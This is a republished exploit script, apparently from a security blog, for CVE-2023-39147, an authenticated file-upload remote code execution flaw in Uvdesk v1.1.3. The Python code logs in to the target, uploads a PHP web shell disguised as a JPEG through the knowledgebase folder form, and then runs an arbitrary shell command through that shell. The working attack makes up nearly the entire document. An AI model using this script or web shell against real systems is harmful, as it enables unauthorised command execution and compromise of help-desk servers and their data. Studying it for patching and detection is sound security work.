Uvdesk v1.1.3 – File Upload Remote Code Execution (RCE) (Authenticated)

渗透技巧 9个月前 admin

239 0 0

# Exploit Title: Uvdesk v1.1.3 – File Upload Remote Code Execution (RCE) (Authenticated)
# Date: 28/07/2023
# Exploit Author: Daniel Barros (@cupc4k3d) – Hakai Offensive Security
# Vendor Homepage: https://www.uvdesk.com
# Software Link: https://github.com/uvdesk/community-skeleton
# Version: 1.1.3
# Example: python3 CVE-2023-39147.py -u “http://$ip:8000/” -c “whoami”
# CVE : CVE-2023-39147
# Tested on: Ubuntu 20.04.6

import requests
import argparse

def get_args():
parser = argparse.ArgumentParser()
parser.add_argument(‘-u’, ‘–url’, required=True, action=’store’, help=’Target url’)
parser.add_argument(‘-c’, ‘–command’, required=True, action=’store’, help=’Command to execute’)
my_args = parser.parse_args()
return my_args

def main():
args = get_args()
base_url = args.url

command = args.command
uploaded_file = “shell.php”
url_cmd = base_url + “//assets/knowledgebase/shell.php?cmd=” + command

# Edit your credentials here
login_data = {
“_username”: “[email protected]”,
“_password”: “passwd”,
“_remember_me”: “off”
}

files = {
“name”: (None, “pwn”),
“description”: (None, “xxt”),
“visibility”: (None, “public”),
“solutionImage”: (uploaded_file, “<?php system($_GET[‘cmd’]); ?>”, “image/jpg”)
}

s = requests.session()
# Login
s.post(base_url + “/en/member/login”, data=login_data)
# Upload
upload_response = s.post(base_url + “/en/member/knowledgebase/folders/new”, files=files)
# Execute command
cmd = s.get(url_cmd)
print(cmd.text)

if __name__ == “__main__”:
main()